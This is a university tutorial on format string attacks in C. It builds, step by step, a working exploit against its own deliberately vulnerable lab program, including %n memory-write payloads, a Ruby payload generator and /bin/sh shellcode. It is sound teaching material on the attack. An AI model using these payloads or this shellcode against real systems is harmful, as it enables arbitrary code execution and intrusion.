Format String Attacks
Introduction
There is a family of C functions that allows programmers to easily output formatted text. These functions are referred to as format string functions. When used properly, they are not vulnerable at all, but when used incorrectly they expose vulnerabilities that allow for arbitrary code execution.
Building a full scale attack
To build a successful format string attack that allows for arbitrary code execution, it is imperative to understand memory, stack structure, and how the format string functions work. Once these are understood, this tutorial will lead you through the following steps building up to arbitrary code execution:
- Reading memory
- Reading exact memory location
- Altering memory with arbitrary data
- Altering exact memory location with arbitrary data
- Altering exact memory location with intentional data
Format string usage
The following program is a simple program that uses a format string function:
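#include <stdio.h>

int main() {
    int a = 5, b = 6;
    /* %x prints the addresses on the 32-bit build used here; %p is the portable choice. */
    char format[] = "A is %i and is at 0x%x.\nB is %i and is at 0x%x.\n";
    printf(format, a, &a, b, &b);
    return 0;
}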
The integer a |
The integer b |
The string format |
The address of b |
The value of b |
The address of a |
The value of a |
The address of format |
When the printf function begins execution, the stack looks like the diagram above. The first three rows in the diagram show the local variables in the main function. The two integers take up 4 bytes each on the stack. The string format takes up 52 bytes of stack space.
When the setup for printf begins, the arguments are pushed onto the stack in reverse order. First the address of b is pushed onto the stack, then the value of b. The address of a and the value of a are then pushed onto the stack. Last, the address of the format string is pushed onto the stack.
When the printf function begins executing, it is unaware of what arguments have been pushed onto the stack. The only thing it requires is the first argument, the address of a string. It begins reading that string and when it encounters something like a %i, it will pop the next item off of the stack. In the above example, the function sees the %i and pops off the value of a, which it then prints. When it reaches the %x it pops off the address of a and prints it. This continues until the end of the string is reached.
So what would happen with the same format string and the function call printf(format)? The stack would look the same, but would not have the value of a, the address of a, the value of b, and the address of b. Therefore, when the printf function reached the first %i, it would retrieve the next four bytes on the stack (part of the string format) and print those as an integer. This might be a bit difficult to grasp, but it is explained a little more in the following section.
Data access
As mentioned previously, format string functions are safe when they are used correctly. The code used previously could not be attacked because there is no way to control the string passed to the printf function (the input string). Format string vulnerabilities arise when the programmer accidentally allows the user to control the input string. The following short program just reads a line from the file named on the command line and writes it to stdout, but uses an input string that the user has control over.
#include <stdlib.h>
#include <stdio.h>
#define BUFSIZE 512

int run(FILE *input) {
    char line[BUFSIZE];
    fgets(line, BUFSIZE, input);
    printf(line);   /* vulnerable: user-controlled data is used as the format string */
    return 0;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "program requires one argument, a filename\n");
        exit(1);
    }
    FILE *fd = fopen(argv[1], "r");
    if (!fd) {
        fprintf(stderr, "file must exist\n");
        exit(1);
    }
    run(fd);
    return 0;
}
This example would be safe if the printf line was: printf("%s", line);
Quickly compiling and running this program shows that it works as expected for harmless input values:
$ gcc -m32 -g -z execstack --no-stack-protector -o example example.c
$ echo "hello world" > input && ./example input
hello world
But what if the input is something with format string arguments?
$ echo "hello %x %i %x %i %x" > input && ./example input
hello 200 134520840 80482a9 0 f7fe09e0
$ echo -e "AAAA.%x.%x.%x.%x.%x.%x" > input && ./example input
AAAA.200.804a008.80482a9.0.f7fe09e0.41414141
The first example above prints hello followed by some data. What is this data? It's data on the stack. The second example above sheds a little more light on what the data really is.
Recalling how the printf function works, the output from the second command prints AAAA followed by the 6 hexadecimal formatted integers. This means the function will read 4 bytes of data 6 times and print the result. The first 4 bytes result in 200; the second, third, and fifth in what look like memory addresses; the fourth in 0; and finally the sixth in 41414141.
The interesting value in this output is 41414141. Everything is actual data read from the stack, though. The information on the stack includes the buffer line (taking up BUFSIZE bytes) as well as other information like the 4 byte address of the buffer line (which was pushed onto the stack when the printf function was called).
41414141 is actually the beginning of the string stored in line (the string that was read from the file). The character A translates to 0x41 in ASCII, so 4 A's is 41414141. Think about what the output would look like if you typed an extra A at the beginning of the input and an extra %x at the end of the input: echo -e "AAAAA.%x.%x.%x.%x.%x.%x.%x" > input && ./example input
Looking back at the output above, you might wonder why the result wasn't just AAAA.41414141.junk.junk.junk.junk.junk. The reason is that the printf function actually calls some internal libc functions before it begins doing any real work. This alters the stack a little bit, adding additional arguments. You can imagine that the internal function call looks something like this: _printf(string, format_arg1, format_arg2, 200, addr, addr, 0, addr). It expects the first format argument to still be the last pushed onto the stack, though, so it prints 200 first since there were no format arguments.
Specific Data Access
Reading data off of the stack is useful, but it can only get you so far. It would be a lot more interesting to be able to read data from anywhere within the program's memory. It's actually possible and pretty easy to do. This example will walk through printing out the value of the environment variable PATH. This isn't very sensitive information, but the same method can be used to access any memory.
#include <stdlib.h>
#include <stdio.h>

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage:\n%s <environment variable name>\n", argv[0]);
        exit(0);
    }
    char *addr = getenv(argv[1]);
    if (addr == NULL) {
        printf("The environment variable %s doesn't exist.\n", argv[1]);
    } else {
        printf("%s is located at %p\n", argv[1], addr);
    }
    return 0;
}
Compiling the program and running it shows the address of the PATH environment variable.
$ gcc -m32 -g -z execstack --no-stack-protector -o getenv getenv.c
$ ./getenv PATH
PATH is located at 0xffffde51
This memory address can easily be encoded at the beginning of the input string and then used to print the value of the PATH environment variable.
$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0.ffffde51
$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0 ... ar/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
$ echo -e "\x4f\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
O???.200.804a008.80482a9.0.f7fe09e0 ... /var/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
The buffer line |
A null value |
A null value |
Some address |
The value 200 |
The address of line |
The address is first encoded into the string in reverse byte order. When the first command is executed, you can see that the address comes out in the proper order. Once this works, it's trivial to change the last %x to a %s. Now rather than printing out the address of the PATH variable it will print out the value of the string at that location. The PATH is printed as a result, but it's slightly off. The address used needs to be two bytes lower; with that change, the command prints the entire PATH environment variable.
The reason that the address needs to be two bytes lower is that the names of the two programs are different lengths. The program getenv is one byte shorter than example. A one byte difference in the command name doubles to a two byte difference in the address offset.
It's important to remember at this point what's actually going on. When entering the string, the entire string is copied onto the stack. The target address is at the beginning of the string (lowest on the stack). As the printf function encounters the %x values, it continues to move up the stack until it reaches the original buffer line. The first four bytes of line are the address ffffde4f, so it can either print that using %x or print the string at that memory location with %s.
Altering Memory
It seems odd that functions for printing would allow writing something in memory. It's actually fairly easy to write something to memory with a format string function. Here's an example program:
#include <stdio.h>

int main() {
    int written;
    printf("hello world\n%n", &written);
    printf("%i bytes written\n", written);
    return 0;
}
The %n in a format string is actually used to track the number of characters written so far while printing something out. This could be useful when using a format string function to print something like a decimal number and you need to know how long the output was. When attacking, it makes it possible to write to memory and change, for example, the return address of a function.
Altering Memory at an Exact Location
A good memory address to alter is the return address of the printf function. It's possible to use gdb to find the return address of the printf function. It's a bit tricky, though, and you must have two shells open.
Alter example.c to make a call to sleep(10) just before calling run(fd). Recompile. Then in one shell, execute the example program. In another shell you should attach gdb to the already running example program as shown below. You'll have to do this within 10 seconds or change the sleep call to something longer to allow more time.
$ ps ax | grep example
8398 pts/1 S+ 0:00 ./example input
8400 pts/2 S+ 0:00 grep example
$ gdb -q example 8398
Attaching to program: /home/example/format/example, process 8398
Reading symbols from /lib32/libc.so.6...done.
Loaded symbols for /lib32/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
warning: Lowest section in system-supplied DSO at 0xffffe000 is .hash at ffffe0b4
0xffffe402 in __kernel_vsyscall ()
(gdb) b printf
Breakpoint 1 at 0xf7ed25e4
(gdb) c
Continuing.
Breakpoint 1, 0xf7ed25e4 in printf () from /lib32/libc.so.6
(gdb) info frame
Stack level 0, frame at 0xffffd5a0:
eip = 0xf7ed25e4 in printf; saved eip 0x80484e8
called by frame at 0xffffd7c0
Arglist at 0xffffd598, args:
Locals at 0xffffd598, Previous frame's sp is 0xffffd5a0
Saved registers:
ebx at 0xffffd594, ebp at 0xffffd598, eip at 0xffffd59c
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /home/example/format/example, process 8398
The gdb output shows that the return address for the printf function is stored at 0xffffd59c, which can now be used for altering the return address.
The way to alter the address is by using a %n in the format string. The string is crafted in the same way as when accessing arbitrary memory. First enter the address to write data to. Then add enough %x's that the format string function will use the address as the next argument. Instead of adding a %s at the end, though, simply put a %n. This will write to the address rather than reading from it.
A quick test shows that altering this address crashes the program, but altering addresses 4 bytes higher does not crash it. Writing to a specific address works.
$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.ffffd59c
$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.
Segmentation fault
$ echo -e "\xa0\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.
Writing desired values
Writing a desired value is a bit more tricky. The %n trick still has to be used. The problem is that when %n writes a value, it actually writes a 4 byte integer. The goal is to have the return address changed to be somewhere within the input string. That location needs to be determined first.
We will use 200 nops so that the address used doesn't have to be exact, so we'll estimate that the buffer is 100 bytes above where printf's return address is stored on the stack. That gives an address of 0xffffd600 (0xffffd59c + 0x64).
Remember, %n writes to a memory location the number of bytes that have been printed so far by the printf function. It's possible in principle to create a string that's 0xffffd600 bytes long and then have the %n, but it's not really practical. Instead, the write can be split up so that one byte is set at a time. Writing the address 0xffffd600 can be split up into four separate operations that write one byte each.
Value written | +0 | +1 | +2 | +3 | +4 | +5 | +6 |
---|---|---|---|---|---|---|---|
0x100 | 00 | 01 | 00 | 00 | | | |
0x1d6 | | d6 | 01 | 00 | 00 | | |
0x1ff | | | ff | 01 | 00 | 00 | |
0x2ff | | | | ff | 02 | 00 | 00 |
Remember that each number being written is 4 bytes long and that the bytes are written in reverse order (least significant byte first). The first byte we need to write is 0x00. To do this, we can make the printed output 256 bytes long (0x100). Then when the %n writes its value, 00 will be written to the first byte, 01 to the second byte, and 00 to the third and fourth bytes. Now we need the %n to write to the address that's one byte higher than the last and put 0xd6 in it. The output needs to be extended to length 0x1d6. To write 0xff the first time, the output can be extended to length 0x1ff. The second 0xff can be written by extending the output to 0x2ff (or by simply writing the same thing again).
The table above shows the writing of 4 numbers. Each number is written one byte higher than the last. The end result is that the value 0xffffd600 is written into the desired memory location. Information is also overwritten in the next 3 bytes, but when overwriting a return address, that doesn't matter.
To get this to work with a format string is actually pretty easy. The formula for what the string should contain is the following:
- The address to write, in reverse byte order
- Four bytes (anything will do, we use junk)
- The address to write +1, in reverse byte order
- Four bytes (anything will do, we use junk)
- The address to write +2, in reverse byte order
- Four bytes (anything will do, we use junk)
- The address to write +3, in reverse byte order
- One less than the number of %8x's needed so the printf function is using arguments from the start of the input string
- Pairs of %#x, %n's (where # is a field width) to write to the addresses
Until now when printing a number we have used %x. What the printf function does for %x is print the number in hexadecimal notation. It doesn't ensure that it will be a certain length, though. You can specify that you want the output to be at least 8 digits long by using %8x. We can use this to our advantage to control the length of the string. Using %100x will output 100 bytes (a 32 bit value never needs more than 8 hex digits, so the width decides the length), and the value written for the %n is now 100 greater.
With the formula above, the small Ruby script below was written to create the proper input string. The important part to notice is the addr_overwrite variable. What the printf function will end up doing is the following. It will print the first address entered followed by the word junk. It will do the same for the next two addresses, and then print the fourth address. Then it will begin handling the %8x's. For each of those it will print exactly 8 bytes (since 32 bit values in hex aren't ever longer than 8 digits). At this point, the next argument that the printf function will interpret is the 4 bytes just before the start of the input string. The printf function now reaches the first pair of %#x, %n's, where # stands for a field width. The %x should have a number in it that will extend the printed string long enough to write the desired integer. The printf function will process that %x by printing whatever is in memory just before the input string. Now it will handle the %n and the argument it will use is the first four bytes of the input string. That's the address that we want to write to, and now it's writing a value that we want. The next %x again extends the string, and the printf function will print out junk in hexadecimal notation. Then another %n, and the printf function will be using the second memory address to write to.
Using ruby will make writing this output a little easier. A small test program will also make it easy to test to see if the output will work properly.
$ cat output.rb
#!/usr/bin/env ruby
shellcode = ""
shellcode += "\xeb\x1c\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43"
shellcode += "\x0c\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd\x80\x31\xdb\x89"
shellcode += "\xd8\x40\xcd\x80\xe8\xdf\xff\xff\xff/bin/sh"
addr_overwrite = ""
addr_overwrite += "\x9c\xd5\xff\xffjunk"
addr_overwrite += "\x9d\xd5\xff\xffjunk"
addr_overwrite += "\x9e\xd5\xff\xffjunk"
addr_overwrite += "\x9f\xd5\xff\xff"
addr_overwrite += "%8x%8x%8x%8x"
addr_overwrite += "%196x%n"
addr_overwrite += "%214x%n"
addr_overwrite += "%41x%n"
addr_overwrite += "%256x%n"
puts addr_overwrite + "\x90" * 200 + shellcode
$ chmod +x output.rb
$ cat test.c
#include <stdio.h>
#include <stdlib.h>
#define INSIZE 512

int main(int argc, char **argv) {
    char line[INSIZE];
    fgets(line, INSIZE, stdin);
    int a, b, c, d;
    printf(line, 1, 2, 3, 4, 0, &a, 0, &b, 0, &c, 0, &d);
    printf("a: 0x%x\nb: 0x%x\nc: 0x%x\nd: 0x%x\n", a, b, c, d);
    return 0;
}
$ gcc -m32 -g -z execstack --no-stack-protector -o test test.c
$ ./output.rb | ./test
????junk????junk????junk???? 1 2 3 4 0 0 0 0?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
??
̀1ۉ?@̀?????/bin/sh
a: 0x100
b: 0x1d6
c: 0x1ff
d: 0x2ff
When working on this part on your own, you'll have to change the values of the last four additions to the addr_overwrite string. When you do this and rerun the command ./output.rb | ./test, you'll see the values for a, b, c and d change. The values here match up with the desired return address 0xffffd600. Once the values are correct, it's time to get a shell.
$ ./output.rb > input
$ ./example input
????junk????junk????junk???? 200 804a008 80482a9 0 f7fe09e0 6b6e756a 6b6e756a 6b6e756a?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
??
̀1ۉ?@̀?????/bin/sh
$ ls
example getenv input output.rb.save sys.c test.c written.c
example.c getenv.c output.rb sys test written
If you have difficulty getting the shellcode to execute, you should attach gdb to the process using the same sleep trick described above. Break at the printf function, then use nexti to advance until the function is about to complete. Then use info frame to see if the return address was changed to the right value.
Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.